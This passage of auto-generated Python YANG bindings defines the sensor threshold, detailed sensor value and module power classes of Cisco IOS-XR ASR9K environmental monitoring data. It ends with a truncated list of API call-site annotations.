self.yang_name = "thresholds"
self.yang_parent_name = "sensor-name"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("threshold", ("threshold", EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes.SensorType.SensorNames.SensorName.Thresholds.Threshold))])
self._leafs = OrderedDict()
self.threshold = YList(self)
self._segment_path = lambda: "thresholds"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes.SensorType.SensorNames.SensorName.Thresholds, [], name, value)
class Threshold(_Entity_):
"""
Types of thresholds
.. attribute:: type (key)
Threshold type
**type**\: str
**pattern:** [\\w\\\-\\.\:,\_@#%$\\+=\\\|;]+
**config**\: False
.. attribute:: value_detailed
Detailed sensor threshold information
**type**\: :py:class:`ValueDetailed <ydk.models.cisco_ios_xr.Cisco_IOS_XR_asr9k_sc_envmon_admin_oper.EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes.SensorType.SensorNames.SensorName.Thresholds.Threshold.ValueDetailed>`
**config**\: False
.. attribute:: trap
Threshold trap enable flag true\-ENABLE, false\-DISABLE
**type**\: bool
**config**\: False
.. attribute:: value_brief
Threshold value for the sensor
**type**\: str
**pattern:** [0\-9a\-fA\-F]{1,8}
**config**\: False
"""
_prefix = 'asr9k-sc-envmon-admin-oper'
_revision = '2017-01-19'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes.SensorType.SensorNames.SensorName.Thresholds.Threshold, self).__init__()
self.yang_name = "threshold"
self.yang_parent_name = "thresholds"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['type']
self._child_classes = OrderedDict([("value-detailed", ("value_detailed", EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes.SensorType.SensorNames.SensorName.Thresholds.Threshold.ValueDetailed))])
self._leafs = OrderedDict([
('type', (YLeaf(YType.str, 'type'), ['str'])),
('trap', (YLeaf(YType.boolean, 'trap'), ['bool'])),
('value_brief', (YLeaf(YType.str, 'value-brief'), ['str'])),
])
self.type = None
self.trap = None
self.value_brief = None
self.value_detailed = EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes.SensorType.SensorNames.SensorName.Thresholds.Threshold.ValueDetailed()
self.value_detailed.parent = self
self._children_name_map["value_detailed"] = "value-detailed"
self._segment_path = lambda: "threshold" + "[type='" + str(self.type) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes.SensorType.SensorNames.SensorName.Thresholds.Threshold, ['type', 'trap', 'value_brief'], name, value)
class ValueDetailed(_Entity_):
"""
Detailed sensor threshold
information
.. attribute:: threshold_severity
Indicates minor, major, critical severities
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: threshold_relation
Indicates relation between sensor value and threshold
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: threshold_value
Value of the configured threshold
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: threshold_evaluation
Indicates the result of the most recent evaluation of the thresholD
**type**\: bool
**config**\: False
.. attribute:: threshold_notification_enabled
Indicates whether or not a notification should result, in case of threshold violation
**type**\: bool
**config**\: False
"""
_prefix = 'asr9k-sc-envmon-admin-oper'
_revision = '2017-01-19'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes.SensorType.SensorNames.SensorName.Thresholds.Threshold.ValueDetailed, self).__init__()
self.yang_name = "value-detailed"
self.yang_parent_name = "threshold"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('threshold_severity', (YLeaf(YType.uint32, 'threshold-severity'), ['int'])),
('threshold_relation', (YLeaf(YType.uint32, 'threshold-relation'), ['int'])),
('threshold_value', (YLeaf(YType.uint32, 'threshold-value'), ['int'])),
('threshold_evaluation', (YLeaf(YType.boolean, 'threshold-evaluation'), ['bool'])),
('threshold_notification_enabled', (YLeaf(YType.boolean, 'threshold-notification-enabled'), ['bool'])),
])
self.threshold_severity = None
self.threshold_relation = None
self.threshold_value = None
self.threshold_evaluation = None
self.threshold_notification_enabled = None
self._segment_path = lambda: "value-detailed"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes.SensorType.SensorNames.SensorName.Thresholds.Threshold.ValueDetailed, ['threshold_severity', 'threshold_relation', 'threshold_value', 'threshold_evaluation', 'threshold_notification_enabled'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_asr9k_sc_envmon_admin_oper as meta
return meta._meta_table['EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes.SensorType.SensorNames.SensorName.Thresholds.Threshold.ValueDetailed']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_asr9k_sc_envmon_admin_oper as meta
return meta._meta_table['EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes.SensorType.SensorNames.SensorName.Thresholds.Threshold']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_asr9k_sc_envmon_admin_oper as meta
return meta._meta_table['EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes.SensorType.SensorNames.SensorName.Thresholds']['meta_info']
class ValueDetailed(_Entity_):
"""
Detailed sensor information including
the sensor value
.. attribute:: field_validity_bitmap
Sensor valid bitmap
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: device_description
Device Name
**type**\: str
**length:** 0..50
**config**\: False
.. attribute:: units
Units of variable being read
**type**\: str
**length:** 0..50
**config**\: False
.. attribute:: device_id
Identifier for this device
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: value
Current reading of sensor
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: alarm_type
Indicates threshold violation
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: data_type
Sensor data type enums
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: scale
Sensor scale enums
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: precision
Sensor precision range
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: status
Sensor operation state enums
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: age_time_stamp
Age of the sensor value; set to the current time if directly access the value from sensor
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: update_rate
Sensor value update rate;set to 0 if sensor value is updated and evaluated immediately
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: average
Average sensor value over time interval
**type**\: int
**range:** \-2147483648..2147483647
**config**\: False
.. attribute:: minimum
Minimum Sensor value over time interval
**type**\: int
**range:** \-2147483648..2147483647
**config**\: False
.. attribute:: maximum
Maximum Sensor value over time interval
**type**\: int
**range:** \-2147483648..2147483647
**config**\: False
.. attribute:: interval
Time Interval over which sensor value is monitored
**type**\: int
**range:** \-2147483648..2147483647
**config**\: False
"""
_prefix = 'asr9k-sc-envmon-admin-oper'
_revision = '2017-01-19'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes.SensorType.SensorNames.SensorName.ValueDetailed, self).__init__()
self.yang_name = "value-detailed"
self.yang_parent_name = "sensor-name"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('field_validity_bitmap', (YLeaf(YType.uint32, 'field-validity-bitmap'), ['int'])),
('device_description', (YLeaf(YType.str, 'device-description'), ['str'])),
('units', (YLeaf(YType.str, 'units'), ['str'])),
('device_id', (YLeaf(YType.uint32, 'device-id'), ['int'])),
('value', (YLeaf(YType.uint32, 'value'), ['int'])),
('alarm_type', (YLeaf(YType.uint32, 'alarm-type'), ['int'])),
('data_type', (YLeaf(YType.uint32, 'data-type'), ['int'])),
('scale', (YLeaf(YType.uint32, 'scale'), ['int'])),
('precision', (YLeaf(YType.uint32, 'precision'), ['int'])),
('status', (YLeaf(YType.uint32, 'status'), ['int'])),
('age_time_stamp', (YLeaf(YType.uint32, 'age-time-stamp'), ['int'])),
('update_rate', (YLeaf(YType.uint32, 'update-rate'), ['int'])),
('average', (YLeaf(YType.int32, 'average'), ['int'])),
('minimum', (YLeaf(YType.int32, 'minimum'), ['int'])),
('maximum', (YLeaf(YType.int32, 'maximum'), ['int'])),
('interval', (YLeaf(YType.int32, 'interval'), ['int'])),
])
self.field_validity_bitmap = None
self.device_description = None
self.units = None
self.device_id = None
self.value = None
self.alarm_type = None
self.data_type = None
self.scale = None
self.precision = None
self.status = None
self.age_time_stamp = None
self.update_rate = None
self.average = None
self.minimum = None
self.maximum = None
self.interval = None
self._segment_path = lambda: "value-detailed"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes.SensorType.SensorNames.SensorName.ValueDetailed, ['field_validity_bitmap', 'device_description', 'units', 'device_id', 'value', 'alarm_type', 'data_type', 'scale', 'precision', 'status', 'age_time_stamp', 'update_rate', 'average', 'minimum', 'maximum', 'interval'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_asr9k_sc_envmon_admin_oper as meta
return meta._meta_table['EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes.SensorType.SensorNames.SensorName.ValueDetailed']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_asr9k_sc_envmon_admin_oper as meta
return meta._meta_table['EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes.SensorType.SensorNames.SensorName']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_asr9k_sc_envmon_admin_oper as meta
return meta._meta_table['EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes.SensorType.SensorNames']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_asr9k_sc_envmon_admin_oper as meta
return meta._meta_table['EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes.SensorType']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_asr9k_sc_envmon_admin_oper as meta
return meta._meta_table['EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes']['meta_info']
class Power(_Entity_):
"""
Module Power Draw
.. attribute:: power_bag
Detailed power bag information
**type**\: :py:class:`PowerBag <ydk.models.cisco_ios_xr.Cisco_IOS_XR_asr9k_sc_envmon_admin_oper.EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.Power.PowerBag>`
**config**\: False
"""
_prefix = 'asr9k-sc-envmon-admin-oper'
_revision = '2017-01-19'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.Power, self).__init__()
self.yang_name = "power"
self.yang_parent_name = "module"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("power-bag", ("power_bag", EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.Power.PowerBag))])
self._leafs = OrderedDict()
self.power_bag = EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.Power.PowerBag()
self.power_bag.parent = self
self._children_name_map["power_bag"] = "power-bag"
self._segment_path = lambda: "power"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.Power, [], name, value)
class PowerBag(_Entity_):
"""
Detailed power bag information
.. attribute:: power_value
Current Power Value of the Unit
**type**\: int
**range:** \-2147483648..2147483647
**config**\: False
.. attribute:: power_max_value
Max Power Value of the Unit
**type**\: int
**range:** \-2147483648..2147483647
**config**\: False
.. attribute:: power_unit_multiplier
Unit Multiplier of Power
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: power_accuracy
Accuracy of the Power Value
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: power_measure_caliber
Measure Caliber
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: power_current_type
Current Type of the Unit
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: power_origin
The Power Origin of the Unit
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: power_admin_state
Admin Status of the Unit
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: power_oper_state
Oper Status of the Unit
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: power_state_enter_reason
Enter Reason for the State
**type**\: str
**length:** 0..50
**config**\: False
"""
_prefix = 'asr9k-sc-envmon-admin-oper'
_revision = '2017-01-19'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.Power.PowerBag, self).__init__()
self.yang_name = "power-bag"
self.yang_parent_name = "power"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('power_value', (YLeaf(YType.int32, 'power-value'), ['int'])),
('power_max_value', (YLeaf(YType.int32, 'power-max-value'), ['int'])),
('power_unit_multiplier', (YLeaf(YType.uint32, 'power-unit-multiplier'), ['int'])),
('power_accuracy', (YLeaf(YType.uint32, 'power-accuracy'), ['int'])),
('power_measure_caliber', (YLeaf(YType.uint32, 'power-measure-caliber'), ['int'])),
('power_current_type', (YLeaf(YType.uint32, 'power-current-type'), ['int'])),
('power_origin', (YLeaf(YType.uint32, 'power-origin'), ['int'])),
('power_admin_state', (YLeaf(YType.uint32, 'power-admin-state'), ['int'])),
('power_oper_state', (YLeaf(YType.uint32, 'power-oper-state'), ['int'])),
('power_state_enter_reason', (YLeaf(YType.str, 'power-state-enter-reason'), ['str'])),
])
self.power_value = None
self.power_max_value = None
self.power_unit_multiplier = None
self.power_accuracy = None
self.power_measure_caliber = None
self.power_current_type = None
self.power_origin = None
self.power_admin_state = None
self.power_oper_state = None
self.power_state_enter_reason = None
self._segment_path = lambda: "power-bag"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.Power.PowerBag, ['power_value', 'power_max_value', 'power_unit_multiplier', 'power_accuracy', 'power_measure_caliber', 'power_current_type', 'power_origin', 'power_admin_state', 'power_oper_state', 'power_state_enter_reason'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_asr9k_sc_envmon_admin_oper as meta
return meta._meta_table['EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.Power.PowerBag']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_asr9k_sc_envmon_admin_oper as meta
return meta._meta_table['EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.Power']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_asr9k_sc_envmon_admin_oper as meta
return meta._meta_table['EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_asr9k_sc_envmon_admin_oper as meta
return meta._meta_table['EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_asr9k_sc_envmon_admin_oper as meta
return meta._meta_table['EnvironmentalMonitoring.Racks.Rack.Slots.Slot']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_asr9k_sc_envmon_admin_oper as meta
return meta._meta_table['EnvironmentalMonitoring.Racks.Rack.Slots']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_asr9k_sc_envmon_admin_oper as meta
return meta._meta_table['EnvironmentalMonitoring.Racks.Rack']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_asr9k_sc_envmon_admin_oper as meta
return meta._meta_table['EnvironmentalMonitoring.Racks']['meta_info']
def clone_ptr(self):
self._top_entity = EnvironmentalMonitoring()
return self._top_entity
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_asr9k_sc_envmon_admin_oper as meta
return meta._meta_table['EnvironmentalMonitoring']['meta_info']
|
[
"collections.OrderedDict",
"ydk.types.YLeaf",
"ydk.types.YList"
] |
[((1787, 1853), 'collections.OrderedDict', 'OrderedDict', (["[('racks', ('racks', EnvironmentalMonitoring.Racks))]"], {}), "([('racks', ('racks', EnvironmentalMonitoring.Racks))])\n", (1798, 1853), False, 'from collections import OrderedDict\n'), ((1876, 1889), 'collections.OrderedDict', 'OrderedDict', ([], {}), '()\n', (1887, 1889), False, 'from collections import OrderedDict\n'), ((3153, 3222), 'collections.OrderedDict', 'OrderedDict', (["[('rack', ('rack', EnvironmentalMonitoring.Racks.Rack))]"], {}), "([('rack', ('rack', EnvironmentalMonitoring.Racks.Rack))])\n", (3164, 3222), False, 'from collections import OrderedDict\n'), ((3249, 3262), 'collections.OrderedDict', 'OrderedDict', ([], {}), '()\n', (3260, 3262), False, 'from collections import OrderedDict\n'), ((3288, 3299), 'ydk.types.YList', 'YList', (['self'], {}), '(self)\n', (3293, 3299), False, 'from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64\n'), ((4828, 4905), 'collections.OrderedDict', 'OrderedDict', (["[('slots', ('slots', EnvironmentalMonitoring.Racks.Rack.Slots))]"], {}), "([('slots', ('slots', EnvironmentalMonitoring.Racks.Rack.Slots))])\n", (4839, 4905), False, 'from collections import OrderedDict\n'), ((6747, 6832), 'collections.OrderedDict', 'OrderedDict', (["[('slot', ('slot', EnvironmentalMonitoring.Racks.Rack.Slots.Slot))]"], {}), "([('slot', ('slot', EnvironmentalMonitoring.Racks.Rack.Slots.Slot))]\n )\n", (6758, 6832), False, 'from collections import OrderedDict\n'), ((6862, 6875), 'collections.OrderedDict', 'OrderedDict', ([], {}), '()\n', (6873, 6875), False, 'from collections import OrderedDict\n'), ((6909, 6920), 'ydk.types.YList', 'YList', (['self'], {}), '(self)\n', (6914, 6920), False, 'from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64\n'), ((8682, 8781), 'collections.OrderedDict', 'OrderedDict', (["[('modules', ('modules', EnvironmentalMonitoring.Racks.Rack.Slots.Slot.\n Modules))]"], {}), "([('modules', ('modules', EnvironmentalMonitoring.Racks.Rack.\n Slots.Slot.Modules))])\n", (8693, 8781), False, 'from collections import OrderedDict\n'), ((10836, 10940), 'collections.OrderedDict', 'OrderedDict', (["[('module', ('module', EnvironmentalMonitoring.Racks.Rack.Slots.Slot.\n Modules.Module))]"], {}), "([('module', ('module', EnvironmentalMonitoring.Racks.Rack.Slots\n .Slot.Modules.Module))])\n", (10847, 10940), False, 'from collections import OrderedDict\n'), ((10978, 10991), 'collections.OrderedDict', 'OrderedDict', ([], {}), '()\n', (10989, 10991), False, 'from collections import OrderedDict\n'), ((11035, 11046), 'ydk.types.YList', 'YList', (['self'], {}), '(self)\n', (11040, 11046), False, 'from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64\n'), ((4980, 5007), 'ydk.types.YLeaf', 'YLeaf', (['YType.uint32', '"""rack"""'], {}), "(YType.uint32, 'rack')\n", (4985, 5007), False, 'from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64\n'), ((13618, 13840), 'collections.OrderedDict', 'OrderedDict', (["[('sensor-types', ('sensor_types', EnvironmentalMonitoring.Racks.Rack.Slots\n .Slot.Modules.Module.SensorTypes)), ('power', ('power',\n EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.Power))]"], {}), "([('sensor-types', ('sensor_types', EnvironmentalMonitoring.\n Racks.Rack.Slots.Slot.Modules.Module.SensorTypes)), ('power', ('power',\n EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.Power))])\n", (13629, 13840), False, 'from collections import OrderedDict\n'), ((16579, 16716), 'collections.OrderedDict', 'OrderedDict', (["[('sensor-type', ('sensor_type', EnvironmentalMonitoring.Racks.Rack.Slots.\n Slot.Modules.Module.SensorTypes.SensorType))]"], {}), "([('sensor-type', ('sensor_type', EnvironmentalMonitoring.Racks.\n Rack.Slots.Slot.Modules.Module.SensorTypes.SensorType))])\n", (16590, 16716), False, 'from collections import OrderedDict\n'), ((16762, 16775), 'collections.OrderedDict', 'OrderedDict', ([], {}), '()\n', (16773, 16775), False, 'from collections import OrderedDict\n'), ((16832, 16843), 'ydk.types.YList', 'YList', (['self'], {}), '(self)\n', (16837, 16843), False, 'from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64\n'), ((64131, 64256), 'collections.OrderedDict', 'OrderedDict', (["[('power-bag', ('power_bag', EnvironmentalMonitoring.Racks.Rack.Slots.Slot.\n Modules.Module.Power.PowerBag))]"], {}), "([('power-bag', ('power_bag', EnvironmentalMonitoring.Racks.Rack\n .Slots.Slot.Modules.Module.Power.PowerBag))])\n", (64142, 64256), False, 'from collections import OrderedDict\n'), ((64302, 64315), 'collections.OrderedDict', 'OrderedDict', ([], {}), '()\n', (64313, 64315), False, 'from collections import OrderedDict\n'), ((8867, 8891), 'ydk.types.YLeaf', 'YLeaf', (['YType.str', '"""slot"""'], {}), "(YType.str, 'slot')\n", (8872, 8891), False, 'from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64\n'), ((19389, 19540), 'collections.OrderedDict', 'OrderedDict', (["[('sensor-names', ('sensor_names', EnvironmentalMonitoring.Racks.Rack.Slots\n .Slot.Modules.Module.SensorTypes.SensorType.SensorNames))]"], {}), "([('sensor-names', ('sensor_names', EnvironmentalMonitoring.\n Racks.Rack.Slots.Slot.Modules.Module.SensorTypes.SensorType.SensorNames))])\n", (19400, 19540), False, 'from collections import OrderedDict\n'), ((70666, 70681), 'collections.OrderedDict', 'OrderedDict', (['[]'], {}), '([])\n', (70677, 70681), False, 'from collections import OrderedDict\n'), ((22417, 22582), 'collections.OrderedDict', 'OrderedDict', (["[('sensor-name', ('sensor_name', EnvironmentalMonitoring.Racks.Rack.Slots.\n Slot.Modules.Module.SensorTypes.SensorType.SensorNames.SensorName))]"], {}), "([('sensor-name', ('sensor_name', EnvironmentalMonitoring.Racks.\n Rack.Slots.Slot.Modules.Module.SensorTypes.SensorType.SensorNames.\n SensorName))])\n", (22428, 22582), False, 'from collections import OrderedDict\n'), ((22631, 22644), 'collections.OrderedDict', 'OrderedDict', ([], {}), '()\n', (22642, 22644), False, 'from collections import OrderedDict\n'), ((22709, 22720), 'ydk.types.YList', 'YList', (['self'], {}), '(self)\n', (22714, 22720), False, 'from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64\n'), ((13940, 13966), 'ydk.types.YLeaf', 'YLeaf', (['YType.str', '"""module"""'], {}), "(YType.str, 'module')\n", (13945, 13966), False, 'from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64\n'), ((26810, 27155), 'collections.OrderedDict', 'OrderedDict', (["[('thresholds', ('thresholds', EnvironmentalMonitoring.Racks.Rack.Slots.\n Slot.Modules.Module.SensorTypes.SensorType.SensorNames.SensorName.\n Thresholds)), ('value-detailed', ('value_detailed',\n EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.\n SensorTypes.SensorType.SensorNames.SensorName.ValueDetailed))]"], {}), "([('thresholds', ('thresholds', EnvironmentalMonitoring.Racks.\n Rack.Slots.Slot.Modules.Module.SensorTypes.SensorType.SensorNames.\n SensorName.Thresholds)), ('value-detailed', ('value_detailed',\n EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.\n SensorTypes.SensorType.SensorNames.SensorName.ValueDetailed))])\n", (26821, 27155), False, 'from collections import OrderedDict\n'), ((30987, 31169), 'collections.OrderedDict', 'OrderedDict', (["[('threshold', ('threshold', EnvironmentalMonitoring.Racks.Rack.Slots.Slot.\n Modules.Module.SensorTypes.SensorType.SensorNames.SensorName.Thresholds\n .Threshold))]"], {}), "([('threshold', ('threshold', EnvironmentalMonitoring.Racks.Rack\n .Slots.Slot.Modules.Module.SensorTypes.SensorType.SensorNames.\n SensorName.Thresholds.Threshold))])\n", (30998, 31169), False, 'from collections import OrderedDict\n'), ((31226, 31239), 'collections.OrderedDict', 'OrderedDict', ([], {}), '()\n', (31237, 31239), False, 'from collections import OrderedDict\n'), ((31310, 31321), 'ydk.types.YList', 'YList', (['self'], {}), '(self)\n', (31315, 31321), False, 'from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64\n'), ((56519, 56534), 'collections.OrderedDict', 'OrderedDict', (['[]'], {}), '([])\n', (56530, 56534), False, 'from collections import OrderedDict\n'), ((19658, 19682), 'ydk.types.YLeaf', 'YLeaf', (['YType.str', '"""type"""'], {}), "(YType.str, 'type')\n", (19663, 19682), False, 'from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64\n'), ((35734, 35940), 'collections.OrderedDict', 'OrderedDict', (["[('value-detailed', ('value_detailed', EnvironmentalMonitoring.Racks.Rack.\n Slots.Slot.Modules.Module.SensorTypes.SensorType.SensorNames.SensorName\n .Thresholds.Threshold.ValueDetailed))]"], {}), "([('value-detailed', ('value_detailed', EnvironmentalMonitoring.\n Racks.Rack.Slots.Slot.Modules.Module.SensorTypes.SensorType.SensorNames\n .SensorName.Thresholds.Threshold.ValueDetailed))])\n", (35745, 35940), False, 'from collections import OrderedDict\n'), ((70811, 70844), 'ydk.types.YLeaf', 'YLeaf', (['YType.int32', '"""power-value"""'], {}), "(YType.int32, 'power-value')\n", (70816, 70844), False, 'from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64\n'), ((70922, 70959), 'ydk.types.YLeaf', 'YLeaf', (['YType.int32', '"""power-max-value"""'], {}), "(YType.int32, 'power-max-value')\n", (70927, 70959), False, 'from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64\n'), ((71043, 71087), 'ydk.types.YLeaf', 'YLeaf', (['YType.uint32', '"""power-unit-multiplier"""'], {}), "(YType.uint32, 'power-unit-multiplier')\n", (71048, 71087), False, 'from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64\n'), ((71164, 71201), 'ydk.types.YLeaf', 'YLeaf', (['YType.uint32', '"""power-accuracy"""'], {}), "(YType.uint32, 'power-accuracy')\n", (71169, 71201), False, 'from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64\n'), ((71285, 71329), 'ydk.types.YLeaf', 'YLeaf', (['YType.uint32', '"""power-measure-caliber"""'], {}), "(YType.uint32, 'power-measure-caliber')\n", (71290, 71329), False, 'from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64\n'), ((71410, 71451), 'ydk.types.YLeaf', 'YLeaf', (['YType.uint32', '"""power-current-type"""'], {}), "(YType.uint32, 'power-current-type')\n", (71415, 71451), False, 'from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64\n'), ((71526, 71561), 'ydk.types.YLeaf', 'YLeaf', (['YType.uint32', '"""power-origin"""'], {}), "(YType.uint32, 'power-origin')\n", (71531, 71561), False, 'from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64\n'), ((71641, 71681), 'ydk.types.YLeaf', 'YLeaf', (['YType.uint32', '"""power-admin-state"""'], {}), "(YType.uint32, 'power-admin-state')\n", (71646, 71681), False, 'from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64\n'), ((71760, 71799), 'ydk.types.YLeaf', 'YLeaf', (['YType.uint32', '"""power-oper-state"""'], {}), "(YType.uint32, 'power-oper-state')\n", (71765, 71799), False, 'from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, 